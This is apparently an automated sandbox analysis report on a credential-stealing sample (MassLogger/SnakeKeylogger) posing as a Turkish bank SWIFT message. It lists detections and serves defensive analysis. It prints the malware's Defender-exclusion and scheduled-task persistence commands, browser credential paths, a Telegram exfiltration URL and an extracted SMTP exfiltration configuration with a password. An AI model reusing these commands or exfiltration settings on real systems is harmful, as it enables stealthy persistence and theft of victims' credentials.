3.2.RegSvcs.exe.3f65610.10.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler
3.2.RegSvcs.exe.3f65610.10.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x153a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x148a7:$a3: \Google\Chrome\User Data\Default\Login Data 0x14bb5:$a4: \Orbitum\User Data\Default\Login Data 0x159ad:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.3f4d5f0.12.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.3f4d5f0.12.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.3f4d5f0.12.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.3f4d5f0.12.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe391:$a1: get_encryptedPassword 0xe6cd:$a2: get_encryptedUsername 0xe11e:$a3: get_timePasswordChanged 0xe23f:$a4: get_passwordField 0xe3a7:$a5: set_encryptedPassword 0xfd77:$a7: get_logins 0xfa28:$a8: GetOutlookPasswords 0xf806:$a9: StartKeylogger 0xfcc7:$a10: KeyLoggerEventArgs 0xf863:$a11: KeyLoggerEventArgsEventHandler
3.2.RegSvcs.exe.3f4d5f0.12.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x135a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12aa7:$a3: \Google\Chrome\User Data\Default\Login Data 0x12db5:$a4: \Orbitum\User Data\Default\Login Data 0x13bad:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.2d40000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.3ea5570.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.3f65610.10.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.3f65610.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.3f65610.10.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.3f65610.10.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe391:$a1: get_encryptedPassword 0xe6cd:$a2: get_encryptedUsername 0xe11e:$a3: get_timePasswordChanged 0xe23f:$a4: get_passwordField 0xe3a7:$a5: set_encryptedPassword 0xfd77:$a7: get_logins 0xfa28:$a8: GetOutlookPasswords 0xf806:$a9: StartKeylogger 0xfcc7:$a10: KeyLoggerEventArgs 0xf863:$a11: KeyLoggerEventArgsEventHandler
3.2.RegSvcs.exe.3f65610.10.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x135a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12aa7:$a3: \Google\Chrome\User Data\Default\Login Data 0x12db5:$a4: \Orbitum\User Data\Default\Login Data 0x13bad:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.3ee0190.13.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 50 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 7796, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 7896, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs" , ProcessId: 7248, ProcessName: wscript.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 7796, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:50 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:50 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 7796, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:50 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7928, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs" , ProcessId: 7248, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 7796, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 7896, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\cyclop\directiveness.exe, ProcessId: 7712, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T09:45:09.483762+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49716	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 5.0.server01.exe.870000.0.unpack

Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\server01.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49726 version: TLS 1.0

Source:	Binary string: tC:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 0000000D.00000002.1515819016.0000000001691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: RegSvcs.exe, 0000000D.00000002.1515819016.00000000015DA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.1367391345.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1368343181.0000000003EA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1365681539.00000000029D1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1534729532.000000000314C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: directiveness.exe, 00000002.00000003.1352506746.0000000004390000.00000004.00001000.00020000.00000000.sdmp, directiveness.exe, 00000002.00000003.1352766385.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, directiveness.exe, 0000000C.00000003.1480054505.0000000004270000.00000004.00001000.00020000.00000000.sdmp, directiveness.exe, 0000000C.00000003.1481253837.0000000004130000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: directiveness.exe, 00000002.00000003.1352506746.0000000004390000.00000004.00001000.00020000.00000000.sdmp, directiveness.exe, 00000002.00000003.1352766385.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, directiveness.exe, 0000000C.00000003.1480054505.0000000004270000.00000004.00001000.00020000.00000000.sdmp, directiveness.exe, 0000000C.00000003.1481253837.0000000004130000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: orlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 0000000D.00000002.1515819016.00000000015FA000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000E6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_000E6CA9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000E60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_000E60DD
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000E63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_000E63F9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000EEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000EEB60
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000EF56F FindFirstFileW,FindClose,	0_2_000EF56F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000EF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_000EF5FA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000F1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000F1B2F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000F1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000F1C8A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000F1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000F1F94
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00636CA9 GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00636CA9
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_006360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	2_2_006360DD
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_006363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	2_2_006363F9
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0063EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0063EB60
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0063F56F FindFirstFileW,FindClose,	2_2_0063F56F
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0063F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_0063F5FA
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00641B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00641B2F
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00641C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00641C8A
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00641F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00641F94

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then jmp 017B7394h	4_2_017B7011
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then jmp 017B78DCh	4_2_017B767A
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	4_2_017B7E60
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	4_2_017B7E54
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 00EA9731h	5_2_00EA9480
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 00EA9E5Ah	5_2_00EA9A40
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 00EA9E5Ah	5_2_00EA9A30
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 4x nop then jmp 00EA9E5Ah	5_2_00EA9D87
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 4x nop then jmp 0637BCBDh	17_2_0637BA40

Source: global traffic

HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View	IP Address: 172.67.177.134 172.67.177.134

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49716 -> 193.122.6.168:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49726 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000F4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_000F4EB5

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: server01.exe, 00000005.00000002.2592996086.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: server01.exe, 00000005.00000002.2592996086.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: RegSvcs.exe, 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: powershell.exe, 00000006.00000002.1435698367.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1427861026.0000000005096000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: server01.exe, 00000005.00000002.2592996086.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: server01.exe, 00000005.00000002.2592996086.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: powershell.exe, 00000006.00000002.1427861026.0000000005096000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: server01.exe, 00000005.00000002.2592996086.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1427861026.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1427861026.0000000005096000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000006.00000002.1427861026.0000000005096000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1427861026.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: RegSvcs.exe, 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: powershell.exe, 00000006.00000002.1435698367.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1435698367.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1435698367.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.1427861026.0000000005096000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1435698367.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75d
Source: server01.exe, 00000005.00000002.2592996086.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75l

Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: server01.exe.3.dr, UltraSpeed.cs	.Net Code: TakeScreenshot
Source: 3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack, UltraSpeed.cs	.Net Code: TakeScreenshot
Source: 3.2.RegSvcs.exe.3f355c0.14.raw.unpack, UltraSpeed.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: server01.exe.3.dr, UltraSpeed.cs	.Net Code: VKCodeToUnicode
Source: 3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode
Source: 3.2.RegSvcs.exe.3f355c0.14.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000F6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_000F6B0C

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000F6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_000F6D07
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00646D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_00646D07

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

0_2_000F6B0C

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000E2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_000E2B37

